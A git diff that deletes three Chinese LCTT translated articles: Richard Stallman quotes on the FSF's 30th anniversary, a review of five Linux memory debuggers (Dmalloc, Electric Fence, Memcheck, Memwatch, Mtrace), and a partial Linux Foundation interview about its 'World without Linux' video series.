diff --git a/translated/talk/20151020 30 Years of Free Software Foundation--Best Quotes of Richard Stallman.md b/translated/talk/20151020 30 Years of Free Software Foundation--Best Quotes of Richard Stallman.md
deleted file mode 100644
index a8d1616106..0000000000
--- a/translated/talk/20151020 30 Years of Free Software Foundation--Best Quotes of Richard Stallman.md
+++ /dev/null
@@ -1,171 +0,0 @@
-30 年自由软件基金会:理查德·斯托曼语录集锦
-================================================================================
-注:youtube 视频
-
-
-**理查德·马修·斯托曼** (rms) – IT大牛之一。他是一名程序员,GCC、GDB、Emacs 的构建者,软件自由传教士,[GNU Project][1] 和 [FSF][2] 的创办人。
-
-**GNU** 是 “GNU’s Not Unix!”的缩写。GNU 是基于 Unix 操作系统的自由计算机软件集合。支持 GNU/Hurd 和 Linux 内核。于1983年9月27日公诸于众。常有组件:
-
-- GNU Compiler Collection (GCC)
-- GNU C library (glibc)
-- GNU Core Utilities (coreutils)
-- GNU Debugger (GDB)
-- GNU Binary Utilities (binutils)
-- GNU Bash shell
-- NOME desktop environment
-
-注:视频
-
-
-**自由软件基金会** (FSF) – 一个自由软件的非营利组织,致力于计算机用户自由的提升和权力的捍卫。于 1985 年 10 月 4 日成立。阅读[更多][3]。
-
-- 于目的无关,随心运行程序的自由(自由0)。
-- 学习程序如何运作,并改变它为你所用的自由(自由1)。可以访问源码是这条的前提。
-- 重新发布副本的自由,如此你便可以帮助你的邻居了 (自由 2)。
-- 发布自己修改版本给他人的自由(自由 3)。这样能让整个社区有机会从你的改变中受益。可以访问源码是这条的前提。
-
-以上为自由软件的四项自由原则。
-
-以下为理查德·斯托曼关于自由、软件、社交、哲学等的名言摘引。
-
-**关于 Facebook:**
-
-> Facebook 不是你的朋友,是监控引擎。
-
-**关于 Android:**
-
-> Android 和 GNU/Linux 有很大的区别,因为其中几乎没有 GNU。的确,Android 和 GNU/Linux 之间仅有一个共同组件,那就是内核 - Linux。
-
-**关于计算机行业:**
-
-> 计算机行业是唯一一个比时尚女装更被时尚驱动的行业。
-
-**关于云计算:**
-
-> 关于云计算,有趣的是我们已经重新定义了云计算来包含我们曾干的所有事。
-
-**关于伦理:**
-
-> 无论神存在与否,都没有绝对的伦理道德。没有这份理所当然,我们该如何?也唯有尽善吧。
-
-**关于自由:**
-
-> 自由软件是尊重个人自由和社会团结的软件。所以才能如自由般自由自在。
-
-**关于目标和理想:**
-
-> 如果你想为这世界做些什么,仅有理想是不够的,你需要找条通往目标的道路并走完。
-
-**关于分享:**
-
-> 分享很棒,而且数字化技术也使分享变得容易。
-
-**关于 facebook(进阶版):**
-
-> Facebook 蹂躏它们的用户。它不是你们的朋友;它就是个监控引擎。举个例子,你是否曾在一些网页或网站上看到 Facebook 的 “like” 按键。对,Facebook 知道你的电脑曾访问过那些网页。
-
-**关于 web 应用:**
-
-> 给你个为什么不应该使用 web 应用的理由,因为你失去了计算机的控制权。
->
-> 如果你使用私有程序或他人的 web 服务器,那么你只能任人鱼肉。被软件的软件的开发者轻易操纵。
-
-**关于书:**
-
-> 印刷出来的书,当然是自由的。即使你买了别人也不知道,这也是我一直买书的方式。买时不会被任何数据库认出。是亚马逊把自由夺走了。
-
-**关于 MPAA:**
-
-> MPAA 其实是美国电影协会(Motion Picture Association of America),但我认为叫做攻击万物的邪恶力量(Malicious Power Attacking All)更为合适。
-
-**关于金钱与职业:**
-
-> 我可以这样赚钱,并沉浸在编码的快乐中。但在职业生涯结束后,回首目睹自己筑就的高墙将人与人分隔开,我会觉得我耗尽毕生精力只换来了一个更糟糕的世界。
-
-**关于私有软件:**
-
-> 私有软件使用户孤立、无助。因为禁止将软件给他人使用所以孤立,因为无法改变源码所以无助。他们学不了其中正真的工作方式。所以整个私有软件体系就是一种不公的力量。
-
-**关于智能手机:**
-
-> 智能手机就是电脑 - 虽然做的和常用的电脑不同 - 但是却能干电脑能干的活。所以我们所说的一切有关于电脑上的软件应该能自由运行 - 必须坚持 - 在智能手机上也是这样。当然也包括平板。
-
-**关于 CD 和数字内容:**
-
-> CD 商店有一个弱势就是需要昂贵的库存,但是电子商店就没有这方面的需求:他们只需要将售卖的副本写入记忆棒,并在你忘带自己的记忆棒时卖你一个就是了。
-
-**关于竞争范式:About paradigm of competition:**
-
-> 竞争范式就像是赛跑:鼓励每一个跑得更快的人。当资本主义真的这样运作时,当然是件好事;但是维护者若是假设它一直这样运作的话那就大错特错了。
-
-**关于 vi 和 emacs:**
-
-> 有时会有人问我在 Emacs 的阵营使用 vi 是不是一种罪过。使用自由版的 vi 并不是一种罪过;是一种忏悔。所以好好享受其中乐趣吧。
-
-**关于自由和历史:**
-
-> 历史教会我们:珍惜自由,否则你将失去他。“别和我们谈政治”,对听不进的人这就是答复。
-
-**关于专利:**
-
-> 和专利一个一个的战斗并不能解决软件专利带来的危害,就像打再多的蚊子也消灭不了疟疾一样。
->
-> 软件专利对于软件的开发者来说十分危险,因为它们加剧了对于软件理念的垄断。
-
-**关于版权:**
-
-> 其实,版权制度对作者也没有什么好处,撇开最受欢迎的那个,其他作者的主旨可能更好理解,所以分享无论对他们还是你的读者都是一件好事。
-
-**关于工作与报酬:**
-
-> 劳有所得,或寻求收入的最大化并没有什么错,只要不是不择手段。
-
-**关于 Chrome OS:**
-
-> Chrome OS 确实是 GNU/Linux 的操作系统。但是,它在发布时没有安装常用应用,并为安装他们设置了阻碍。
-
-**关于 Linux 用户:**
-
-> 许多的 GNU/Linux 用户并没有听过自由软件。他们并没有意识到,这个系统是因为道德理想才存在的,与此一起被忽视的还有所谓的“开源”。
-
-**关于 facebook 的隐私:**
-
-> 如果页面上有 “like” 按键,Facebook 就能知道谁访问了页面。即使不是 Facebook 的用户,也可以得到访问该页面电脑的 IP 地址。
-
-**关于编程:**
-
-> 编程不是科学,编程是手艺。
->
-> Lisp 和 C 语言是我的最爱。然自 1992 年以来高频的自由软件活动,确实反映了我编的太过匆忙。大概在 2008 年我便停止了编程开发。
->
-> C++ 设计的真糟糕、真丑陋。在 Emacs 上用他应该觉得羞愧。
-
-**关于钻研(hacking)和学习编程:**
-
-> 今时不同往日,大家再也不用走我的老路了,完全可以在实际的操作系统上提升自己。上世纪 80 年代,我常遇见计算机专业的毕业生,自出生以来没见过真正的程序。他们接触的到的只有小玩意和学校的作业,因为每一个程序都是商业机密。他们没有机会去写真正实用的特性,修复用户真正遭遇的问题。做这些事便是你应知晓的最好的提升方式。
->
-> 对于如 hacking 这般多样化的东西真的很难简单的下定义,不过在我看来诸如此类的行为都会有以下的这些共同点:嬉乐、智慧和探索。因此,hacking 意味着对可能的极限的探索,一颗向往快乐与智慧心。能带来快乐与智慧的行为就有 “hack 的价值” 。
-
-**关于浏览网页:**
-
-> 由于个人原因,我不会在我的电脑上浏览网页。(大部分时间处于没有网络连接的状态。)要浏览网页,我需要给守护进程发 mail,然后它会运行 wget 并把页面通过 mail 发还给我。这对我而言已经是最效率了,但那真的比实时慢太多了。
-
-**关于音乐共享:**
-
-> 朋友之间彼此分享音乐,绝不会希望因为系统的一句:禁止私下拷贝!而生分。
-
---------------------------------------------------------------------------------
-
-via: https://tlhp.cf/fsf-richard-stallman/
-
-作者:[Pavlo Rudyi][a]
-译者:[martin2011qi](https://github.com/martin2011qi)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://tlhp.cf/fsf-richard-stallman/
-[1]:http://www.gnu.org/
-[2]:http://www.fsf.org/
-[3]:https://www.fsf.org/about/
\ No newline at end of file
diff --git a/translated/talk/20151124 Review--5 memory debuggers for Linux coding.md b/translated/talk/20151124 Review--5 memory debuggers for Linux coding.md
deleted file mode 100644
index b49ba9e40a..0000000000
--- a/translated/talk/20151124 Review--5 memory debuggers for Linux coding.md
+++ /dev/null
@@ -1,299 +0,0 @@
-点评:Linux编程中五款内存调试器
-================================================================================
-![](http://images.techhive.com/images/article/2015/11/penguinadmin-2400px-100627186-primary.idge.jpg)
-Credit: [Moini][1]
-
-作为一个程序员,我知道我总在犯错误——事实是,怎么可能会不犯错的!程序员也是人啊。有的错误能在编码过程中及时发现,而有些却得等到软件测试才显露出来。然而,有一类错误并不能在这两个时期被排除,从而导致软件不能正常运行,甚至是提前中止。
-
-想到了吗?我说的就是内存相关的错误。手动调试这些错误不仅耗时,而且很难发现并纠正。值得一提的是,这种错误非常地常见,特别是在一些软件里,这些软件是用C/C++这类允许[手动管理内存][2]的语言编写的。
-
-幸运的是,现行有一些编程工具能够帮你找到软件程序中这些内存相关的错误。在这些工具集中,我评定了五款Linux可用的,流行、免费并且开源的内存调试器:Dmalloc、Electric Fence、 Memcheck、 Memwatch以及Mtrace。日常编码过程中我已经把这五个调试器用了个遍,所以这些点评是建立在我的实际体验之上的。
-
-### [Dmalloc][3] ###
-
-**开发者**:Gray Watson
-
-**点评版本**:5.5.2
-
-**Linux支持**:所有种类
-
-**许可**:知识共享署名-相同方式共享许可证3.0
-
-Dmalloc是Gray Watson开发的一款内存调试工具。它实现成库,封装了标准内存管理函数如**malloc(), calloc(), free()**等,使得程序员得以检测出有问题的代码。
-
-![cw dmalloc output](http://images.techhive.com/images/article/2015/11/cw_dmalloc-output-100627040-large.idge.png)
-Dmalloc
-
-如同工具的网页所列,这个调试器提供的特性包括内存泄漏跟踪、[重复释放(double free)][4]错误跟踪、以及[越界写入(fence-post write)][5]检测。其它特性包括文件/行号报告、普通统计记录。
-
-#### 更新内容 ####
-
-5.5.2版本是一个[bug修复发行版][6],同时修复了构建和安装的问题。
-
-#### 有何优点 ####
-
-Dmalloc最大的优点是可以进行任意配置。比如说,你可以配置以支持C++程序和多线程应用。Dmalloc还提供一个有用的功能:运行时可配置,这表示在Dmalloc执行时,可以轻易地使能或者禁能它提供的特性。
-
-你还可以配合[GNU Project Debugger (GDB)][7]来使用Dmalloc,只需要将dmalloc.gdb文件(位于Dmalloc源码包中的contrib子目录里)的内容添加到你的主目录中的.gdbinit文件里即可。
-
-另外一个优点让我对Dmalloc爱不释手的是它有大量的资料文献。前往官网的[Documentation标签][8],可以获取任何内容,有关于如何下载、安装、运行,怎样使用库,和Dmalloc所提供特性的细节描述,及其输入文件的解释。里面还有一个章节介绍了一般问题的解决方法。
-
-#### 注意事项 ####
-
-跟Mtrace一样,Dmalloc需要程序员改动他们的源代码。比如说你可以(必须的)添加头文件**dmalloc.h**,工具就能汇报产生问题的调用的文件或行号。这个功能非常有用,因为它节省了调试的时间。
-
-除此之外,还需要在编译你的程序时,把Dmalloc库(编译源码包时产生的)链接进去。
-
-然而,还有点更麻烦的事,需要设置一个环境变量,命名为**DMALLOC_OPTION**,以供工具在运行时配置内存调试特性,以及输出文件的路径。可以手动为该环境变量分配一个值,不过初学者可能会觉得这个过程有点困难,因为你想使能的Dmalloc特性是存在于这个值之中的——表示为各自的十六进制值的累加。[这里][9]有详细介绍。
-
-一个比较简单方法设置这个环境变量是使用[Dmalloc实用指令][10],这是专为这个目的设计的方法。
-
-#### 总结 ####
-
-Dmalloc真正的优势在于它的可配置选项。而且高度可移植,曾经成功移植到多种操作系统如AIX、BSD/OS、DG/UX、Free/Net/OpenBSD、GNU/Hurd、HPUX、Irix、Linux、MS-DOG、NeXT、OSF、SCO、Solaris、SunOS、Ultrix、Unixware甚至Unicos(运行在Cray T3E主机上)。虽然Dmalloc有很多东西需要学习,但是它所提供的特性值得为之付出。
-
-### [Electric Fence][15] ###
-
-**开发者**:Bruce Perens
-
-**点评版本**:2.2.3
-
-**Linux支持**:所有种类
-
-**许可**:GNU 通用公共许可证 (第二版)
-
-Electric Fence是Bruce Perens开发的一款内存调试工具,它以库的形式实现,你的程序需要链接它。Electric Fence能检测出[栈][11]内存溢出和访问已经释放的内存。
-
-![cw electric fence output](http://images.techhive.com/images/article/2015/11/cw_electric-fence-output-100627041-large.idge.png)
-Electric Fence
-
-顾名思义,Electric Fence在每个申请的缓存边界建立了fence(防护),任何非法内存访问都会导致[段错误][12]。这个调试工具同时支持C和C++编程。
-
-
-#### 更新内容 ####
-
-2.2.3版本修复了工具的构建系统,使得-fno-builtin-malloc选项能真正传给[GNU Compiler Collection (GCC)][13]。
-
-#### 有何优点 ####
-
-我喜欢Electric Fence首要的一点是(Memwatch、Dmalloc和Mtrace所不具有的),这个调试工具不需要你的源码做任何的改动,你只需要在编译的时候把它的库链接进你的程序即可。
-
-其次,Electric Fence实现一个方法,确认导致越界访问(a bounds violation)的第一个指令就是引起段错误的原因。这比在后面再发现问题要好多了。
-
-不管是否有检测出错误,Electric Fence经常会在输出产生版权信息。这一点非常有用,由此可以确定你所运行的程序已经启用了Electric Fence。
-
-#### 注意事项 ####
-
-另一方面,我对Electric Fence真正念念不忘的是它检测内存泄漏的能力。内存泄漏是C/C++软件最常见也是最难隐秘的问题之一。不过,Electric Fence不能检测出堆内存溢出,而且也不是线程安全的。
-
-基于Electric Fence会在用户分配内存区的前后分配禁止访问的虚拟内存页,如果你过多的进行动态内存分配,将会导致你的程序消耗大量的额外内存。
-
-Electric Fence还有一个局限是不能明确指出错误代码所在的行号。它所能做只是在监测到内存相关错误时产生段错误。想要定位行号,需要借助[The Gnu Project Debugger (GDB)][14]这样的调试工具来调试你启用了Electric Fence的程序。
-
-最后一点,Electric Fence虽然能检测出大部分的缓冲区溢出,有一个例外是,如果所申请的缓冲区大小不是系统字长的倍数,这时候溢出(即使只有几个字节)就不能被检测出来。
-
-#### 总结 ####
-
-尽管有那么多的局限,但是Electric Fence的优点却在于它的易用性。程序只要链接工具一次,Electric Fence就可以在监测出内存相关问题的时候报警。不过,如同前面所说,Electric Fence需要配合像GDB这样的源码调试器使用。
-
-
-### [Memcheck][16] ###
-
-**开发者**:[Valgrind开发团队][17]
-
-**点评版本**:3.10.1
-
-**Linux支持**:所有种类
-
-**许可**:通用公共许可证
-
-[Valgrind][18]是一个提供好几款调试和Linux程序性能分析工具的套件。虽然Valgrind和编写语言各不相同(有Java、Perl、Python、Assembly code、ortran、Ada等等)的程序配合工作,但是它所提供的工具大部分都意在支持C/C++所编写的程序。
-
-Memcheck作为内存错误检测器,是一款最受欢迎的Memcheck工具。它能够检测出诸多问题诸如内存泄漏、无效的内存访问、未定义变量的使用以及栈内存分配和释放相关的问题等。
-
-#### 更新内容 ####
-
-工具套件(3.10.1)的[发行版][19]是一个副版本,主要修复了3.10.0版本发现的bug。除此之外,从主版本backport一些包,修复了缺失的AArch64 ARMv8指令和系统调用。
-
-#### 有何优点 ####
-
-同其它所有Valgrind工具一样,Memcheck也是基本的命令行实用程序。它的操作非常简单:通常我们会使用诸如prog arg1 arg2格式的命令来运行程序,而Memcheck只要求你多加几个值即可,就像valgrind --leak-check=full prog arg1 arg2。
-
-![cw memcheck output](http://images.techhive.com/images/article/2015/11/cw_memcheck-output-100627037-large.idge.png)
-Memcheck
-
-(注意:因为Memcheck是Valgrind的默认工具所以无需提及Memcheck。但是,需要在编译程序之初带上-g参数选项,这一步会添加调试信息,使得Memcheck的错误信息会包含正确的行号。)
-
-我真正倾心于Memcheck的是它提供了很多命令行选项(如上所述的--leak-check选项),如此不仅能控制工具运转还可以控制它的输出。
-
-举个例子,可以开启--track-origins选项,以查看程序源码中未初始化的数据。可以开启--show-mismatched-frees选项让Memcheck匹配内存的分配和释放技术。对于C语言所写的代码,Memcheck会确保只能使用free()函数来释放内存,malloc()函数来申请内存。而对C++所写的源码,Memcheck会检查是否使用了delete或delete[]操作符来释放内存,以及new或者new[]来申请内存。
-
-Memcheck最好的特点,尤其是对于初学者来说的,是它会给用户建议使用那个命令行选项能让输出更加有意义。比如说,如果你不使用基本的--leak-check选项,Memcheck会在输出时建议“使用--leak-check=full重新运行,查看更多泄漏内存细节”。如果程序有未初始化的变量,Memcheck会产生信息“使用--track-origins=yes,查看未初始化变量的定位”。
-
-Memcheck另外一个有用的特性是它可以[创建抑制文件(suppression files)][20],由此可以忽略特定不能修正的错误,这样Memcheck运行时就不会每次都报警了。值得一提的是,Memcheck会去读取默认抑制文件来忽略系统库(比如C库)中的报错,这些错误在系统创建之前就已经存在了。可以选择创建一个新的抑制文件,或是编辑现有的(通常是/usr/lib/valgrind/default.supp)。
-
-Memcheck还有高级功能,比如可以使用[定制内存分配器][22]来[检测内存错误][21]。除此之外,Memcheck提供[监控命令][23],当用到Valgrind的内置gdbserver,以及[客户端请求][24]机制(不仅能把程序的行为告知Memcheck,还可以进行查询)时可以使用。
-
-#### 注意事项 ####
-
-毫无疑问,Memcheck可以节省很多调试时间以及省去很多麻烦。但是它使用了很多内存,导致程序执行变慢([由资料可知][25],大概花上20至30倍时间)。
-
-除此之外,Memcheck还有其它局限。根据用户评论,Memcheck明显不是[线程安全][26]的;它不能检测出 [静态缓冲区溢出][27];还有就是,一些Linux程序如[GNU Emacs][28],目前还不能使用Memcheck。
-
-如果有兴趣,可以在[这里][29]查看Valgrind详尽的局限性说明。
-
-#### 总结 ####
-
-无论是对于初学者还是那些需要高级特性的人来说,Memcheck都是一款便捷的内存调试工具。如果你仅需要基本调试和错误核查,Memcheck会非常容易上手。而当你想要使用像抑制文件或者监控指令这样的特性,就需要花一些功夫学习了。
-
-虽然罗列了大量的局限性,但是Valgrind(包括Memcheck)在它的网站上声称全球有[成千上万程序员][30]使用了此工具。开发团队称收到来自超过30个国家的用户反馈,而这些用户的工程代码有的高达2.5千万行。
-
-### [Memwatch][31] ###
-
-**开发者**:Johan Lindh
-
-**点评版本**:2.71
-
-**Linux支持**:所有种类
-
-**许可**:GNU通用公共许可证
-
-Memwatch是由Johan Lindh开发的内存调试工具,虽然它主要扮演内存泄漏检测器的角色,但是它也具有检测其它如[重复释放跟踪和内存错误释放][32]、缓冲区溢出和下溢、[野指针][33]写入等等内存相关问题的能力(根据网页介绍所知)。
-
-Memwatch支持用C语言所编写的程序。可以在C++程序中使用它,但是这种做法并不提倡(由Memwatch源码包随附的Q&A文件中可知)。
-
-#### 更新内容 ####
-
-这个版本添加了ULONG_LONG_MAX以区分32位和64位程序。
-
-#### 有何优点 ####
-
-跟Dmalloc一样,Memwatch也有优秀的文献资料。参考USING文件,可以学习如何使用Memwatch,可以了解Memwatch是如何初始化、如何清理以及如何进行I/O操作的,等等不一而足。还有一个FAQ文件,旨在帮助用户解决使用过程遇到的一般问题。最后还有一个test.c文件提供工作案例参考。
-
-![cw memwatch output](http://images.techhive.com/images/article/2015/11/cw_memwatch_output-100627038-large.idge.png)
-Memwatch
-
-不同于Mtrace,Memwatch的输出产生的日志文件(通常是memwatch.log)是人类可阅读格式。而且,Memwatch每次运行时总会拼接内存调试输出到此文件末尾,而不是进行覆盖(译改)。如此便可在需要之时,轻松查看之前的输出信息。
-
-同样值得一提的是当你执行了启用Memwatch的程序,Memwatch会在[标准输出][34]中产生一个单行输出,告知发现了错误,然后你可以在日志文件中查看输出细节。如果没有产生错误信息,就可以确保日志文件不会写入任何错误,多次运行的话能实际节省时间。
-
-另一个我喜欢的优点是Memwatch同样在源码中提供一个方法,你可以据此获取Memwatch的输出信息,然后任由你进行处理(参考Memwatch源码中的mwSetOutFunc()函数获取更多有关的信息)。
-
-#### 注意事项 ####
-
-跟Mtrace和Dmalloc一样,Memwatch也需要你往你的源文件里增加代码:你需要把memwatch.h这个头文件包含进你的代码。而且,编译程序的时候,你需要连同memwatch.c一块编译;或者你可以把已经编译好的目标模块包含起来,然后在命令行定义MEMWATCH和MW_STDIO变量。不用说,想要在输出中定位行号,-g编译器选项也少不了。
-
-还有一些没有具备的特性。比如Memwatch不能检测出往一块已经被释放的内存写入操作,或是在分配的内存块之外的读取操作。而且,Memwatch也不是线程安全的。还有一点,正如我在开始时指出,在C++程序上运行Memwatch的结果是不能预料的。
-
-#### 总结 ####
-
-Memcheck可以检测很多内存相关的问题,在处理C程序时是非常便捷的调试工具。因为源码小巧,所以可以从中了解Memcheck如何运转,有需要的话可以调试它,甚至可以根据自身需求扩展升级它的功能。
-
-### [Mtrace][35] ###
-
-**开发者**: Roland McGrath and Ulrich Drepper
-
-**点评版本**: 2.21
-
-**Linux支持**:所有种类
-
-**许可**:GNU通用公共许可证
-
-Mtrace是[GNU C库][36]中的一款内存调试工具,同时支持Linux C和C++程序,检测由malloc()和free()函数的不对等调用所引起的内存泄漏问题。
-
-![cw mtrace output](http://images.techhive.com/images/article/2015/11/cw_mtrace-output-100627039-large.idge.png)
-Mtrace
-
-Mtrace实现为对mtrace()函数的调用,跟踪程序中所有malloc/free调用,在用户指定的文件中记录相关信息。文件以一种机器可读的格式记录数据,所以有一个Perl脚本(同样命名为mtrace)用来把文件转换并展示为人类可读格式。
-
-#### 更新内容 ####
-
-[Mtrace源码][37]和[Perl文件][38]同GNU C库(2.21版本)一起释出,除了更新版权日期,其它别无改动。
-
-#### 有何优点 ####
-
-Mtrace 最优秀的特点是非常简单易学。你只需要了解在你的源码中如何以及何处添加 mtrace() 及其对应的 muntrace() 函数,还有如何使用 Mtrace 的 Perl 脚本。后者非常简单,只需要运行指令 mtrace (例子见开头截图最后一条指令)。
-
-Mtrace 另外一个优点是它的可伸缩性,体现在:不仅可以使用它来调试完整的程序,还可以使用它来检测程序中独立模块的内存泄漏。只需在每个模块里调用 mtrace() 和 muntrace() 即可。
-
-最后一点,因为 Mtrace 会在 mtrace()(在源码中添加的函数)执行时被触发,因此可以很灵活地[使用信号][39]动态地(在程序执行周期内)启用 Mtrace。
-
-#### 注意事项 ####
-
-因为 Mtrace 的运行依赖于对 mtrace() 和 muntrace() 函数的调用(这两个函数在 mcheck.h 文件中声明,所以必须在源码中包含此头文件),而 muntrace() 函数并非[总是必要][40],因此 Mtrace 要求程序员至少改动源码一次。
-
-要了解的是,需要在编译程序的时候带上 -g 选项([GCC][41] 和 [G++][42] 编译器均有提供),才能使调试工具在输出中展示正确的行号。除此之外,有些程序(取决于源码体积有多大)可能会花很长时间进行编译。最后,带 -g 选项编译会增大可执行文件的体积(因为包含了额外的调试信息),因此记得在测试结束后,不带 -g 选项重新编译程序。
-
-使用Mtrace,你需要掌握Linux环境变量的基本知识,因为在程序执行之前,需要把用户指定文件(mtrace()函数用以记载全部信息)的路径设置为环境变量MALLOC_TRACE的值。
-
-Mtrace 的功能局限于检测内存泄漏和释放未分配内存的尝试。它不能检测其它内存相关问题,如非法内存访问、使用未初始化内存等。而且,[有人抱怨][43]Mtrace 不是[线程安全][44]的。
-
-### 总结 ###
-
-不言自明,我在此讨论的每款内存调试器都有其优点和局限。所以,哪一款适合你取决于你所需要的特性,虽然有时候容易安装和使用也是一个决定因素。
-
-要想捕获软件程序中的内存泄漏,Mtrace 最适合不过了,它还可以节省时间。由于 Linux 系统已经预装了此工具,对于不能联网或者不可以下载第三方调试工具的情况,Mtrace 也是极有助益的。
-
-另一方面,相比 Mtrace,Dmalloc 不仅能检测更多错误类型,还能提供更多特性,比如运行时可配置、GDB 集成。而且,Dmalloc 不像这里所说的其它工具,它是线程安全的。更不用说它的详细资料了,这让 Dmalloc 成为初学者的理想选择。
-
-虽然Memwatch的资料比Dmalloc的更加丰富,而且还能检测更多的错误种类,但是你只能在C语言写就的软件程序上使用它。一个让Memwatch脱颖而出的特性是它允许在你的程序源码中处理它的输出,这对于想要定制输出格式来说是非常有用的。
-
-如果改动程序源码非你所愿,那么使用 Electric Fence 吧。不过,请记住,Electric Fence 只能检测两种错误类型,而此二者均非内存泄漏。还有就是,需要了解 GDB 基础,以最大程度发挥这款内存调试工具的作用。
-
-Memcheck 可能是这当中综合性最好的了。相比这里所说的其它工具,它能检测更多的错误类型,提供更多的特性,而且不需要对你的源码做任何改动。但请注意,虽然基本功能并不难上手,想要使用它的高级特性,就必须学习相关的专业知识了。
-
---------------------------------------------------------------------------------
-
-via: http://www.computerworld.com/article/3003957/linux/review-5-memory-debuggers-for-linux-coding.html
-
-作者:[Himanshu Arora][a]
-译者:[soooogreen](https://github.com/soooogreen)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.computerworld.com/author/Himanshu-Arora/
-[1]:https://openclipart.org/detail/132427/penguin-admin
-[2]:https://en.wikipedia.org/wiki/Manual_memory_management
-[3]:http://dmalloc.com/
-[4]:https://www.owasp.org/index.php/Double_Free
-[5]:https://stuff.mit.edu/afs/sipb/project/gnucash-test/src/dmalloc-4.8.2/dmalloc.html#Fence-Post%20Overruns
-[6]:http://dmalloc.com/releases/notes/dmalloc-5.5.2.html
-[7]:http://www.gnu.org/software/gdb/
-[8]:http://dmalloc.com/docs/
-[9]:http://dmalloc.com/docs/latest/online/dmalloc_26.html#SEC32
-[10]:http://dmalloc.com/docs/latest/online/dmalloc_23.html#SEC29
-[11]:https://en.wikipedia.org/wiki/Memory_management#Dynamic_memory_allocation
-[12]:https://en.wikipedia.org/wiki/Segmentation_fault
-[13]:https://en.wikipedia.org/wiki/GNU_Compiler_Collection
-[14]:http://www.gnu.org/software/gdb/
-[15]:https://launchpad.net/ubuntu/+source/electric-fence/2.2.3
-[16]:http://valgrind.org/docs/manual/mc-manual.html
-[17]:http://valgrind.org/info/developers.html
-[18]:http://valgrind.org/
-[19]:http://valgrind.org/docs/manual/dist.news.html
-[20]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.suppfiles
-[21]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.mempools
-[22]:http://stackoverflow.com/questions/4642671/c-memory-allocators
-[23]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.monitor-commands
-[24]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.clientreqs
-[25]:http://valgrind.org/docs/manual/valgrind_manual.pdf
-[26]:http://sourceforge.net/p/valgrind/mailman/message/30292453/
-[27]:https://msdn.microsoft.com/en-us/library/ee798431%28v=cs.20%29.aspx
-[28]:http://www.computerworld.com/article/2484425/linux/5-free-linux-text-editors-for-programming-and-word-processing.html?nsdr=true&page=2
-[29]:http://valgrind.org/docs/manual/manual-core.html#manual-core.limits
-[30]:http://valgrind.org/info/
-[31]:http://www.linkdata.se/sourcecode/memwatch/
-[32]:http://www.cecalc.ula.ve/documentacion/tutoriales/WorkshopDebugger/007-2579-007/sgi_html/ch09.html
-[33]:http://c2.com/cgi/wiki?WildPointer
-[34]:https://en.wikipedia.org/wiki/Standard_streams#Standard_output_.28stdout.29
-[35]:http://www.gnu.org/software/libc/manual/html_node/Tracing-malloc.html
-[36]:https://www.gnu.org/software/libc/
-[37]:https://sourceware.org/git/?p=glibc.git;a=history;f=malloc/mtrace.c;h=df10128b872b4adc4086cf74e5d965c1c11d35d2;hb=HEAD
-[38]:https://sourceware.org/git/?p=glibc.git;a=history;f=malloc/mtrace.pl;h=0737890510e9837f26ebee2ba36c9058affb0bf1;hb=HEAD
-[39]:http://webcache.googleusercontent.com/search?q=cache:s6ywlLtkSqQJ:www.gnu.org/s/libc/manual/html_node/Tips-for-the-Memory-Debugger.html+&cd=1&hl=en&ct=clnk&gl=in&client=Ubuntu
-[40]:http://www.gnu.org/software/libc/manual/html_node/Using-the-Memory-Debugger.html#Using-the-Memory-Debugger
-[41]:http://linux.die.net/man/1/gcc
-[42]:http://linux.die.net/man/1/g++
-[43]:https://sourceware.org/ml/libc-help/2014-05/msg00008.html
-[44]:https://en.wikipedia.org/wiki/Thread_safety
diff --git a/translated/talk/20151126 Linux Foundation Explains a 'World without Linux' and Open Source.md b/translated/talk/20151126 Linux Foundation Explains a 'World without Linux' and Open Source.md
deleted file mode 100644
index 3f0170de0a..0000000000
--- a/translated/talk/20151126 Linux Foundation Explains a 'World without Linux' and Open Source.md
+++ /dev/null
@@ -1,52 +0,0 @@
-没有 Linux 和开源软件的世界会变得怎么样 —— 听听来自 Linux 基金会的解释
-================================================================================
-> Linux 基金会最近针对人们关于 “没有 Linux 的世界” 系列短片提出的问题做了回应:包括没有 Linux 和其他开源软件的因特网会变得怎么样等问题。
-
-![](http://thevarguy.com/site-files/thevarguy.com/files/imagecache/medium_img/uploads/2015/11/hey_22.png)
-
-假如 Linux —— 一个开源的操作系统内核 —— 不曾出现过,我们现在的世界是否会是另一番景象。会不会没有了因特网,或者没有了电影?这些都是 [Linux 基金会][1] 正在连续播出的 “[没有 Linux 的世界][2]” 系列短片的观众提出来的问题。
-
-假如你错过了观看这些短片也不要紧,“没有 Linux 的世界” 系列短片是一个古怪的短片集合,里边描述了没有了 Linux (或者说没有开源软件)的世界发生的事情。这些短片强调了 Linux 在 [电影制作][3] 以及 [服务于因特网][4] 中充当的角色。
-
-为了提供该系列短片的一些主张、方向和隐藏元素,Linux 基金会副主席 Jennifer Cloer 最近在 The VAR Guy 上回应了关于该短片的一些问题。以下是她的原话解答。
-
-### 最新一集短片 —— Sam 和 Annie 一起看电影。假如没有 Linux,我们现在的荧屏是不是也和短片中的一样? ###
-
-在 #4 剧情中,我们恶搞了一下电影 “Avatar”。不管你喜欢还是讨厌,现实中的 “Avatar” 在荧屏上的效果还是让人印象深刻的。在没有 Linux 的世界中,电影的效果就变得非常糟糕,但是我们并不介意它,因为那已经是最好的了。但实际上,“Avatar” 是使用了 Linux 来进行效果制作的。Weta 数码使用了当时世界上最大的 Linux 集群来给电影做效果渲染和 3D 建模。据报道,指环王(Lord of the Rings)、神奇四侠(Fantastic Four)和金刚(King Kong)等电影都用到了 Linux。我们希望这一集能让人们关注到这些制作工作,因为它们还没有被广泛报道过。
-
-### 很多人对短片的原始剧情进行了批判,其中包括没有 Linux 将没有因特网。你对此持什么样的看法? ###
-
